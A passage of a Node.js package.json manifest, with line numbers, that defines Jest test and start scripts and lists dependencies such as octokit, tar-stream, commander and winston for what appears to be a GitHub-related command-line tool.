--experimental-vm-modules node_modules/jest/bin/jest.js", 8 | "start": "node index.mjs" 9 | }, 10 | "type": "module", 11 | "keywords": [], 12 | "author": "", 13 | "license": "ISC", 14 | "dependencies": { 15 | "chalk": "^5.3.0", 16 | "commander": "^12.1.0", 17 | "dotenv": "^16.4.1", 18 | "gunzip-maybe": "^1.4.2", 19 | "octokit": "^4.0.2", 20 | "tar-stream": "^3.1.7", 21 | "winston": "^3.13.0", 22 | "yaml": "^2.5.1" 23 | }, 24 | "devDependencies": { 25 | "eslint": "^8.56.0", 26 | "eslint-config-airbnb-base": "^15.0.0", 27 | "eslint-config-standard": "^17.1.0", 28 | "jest": "^29.7.0" 
29 | }, 30 | "jest": { 31 | "transform": {} 32 | } 33 | } 34 | --------------------------------------------------------------------------------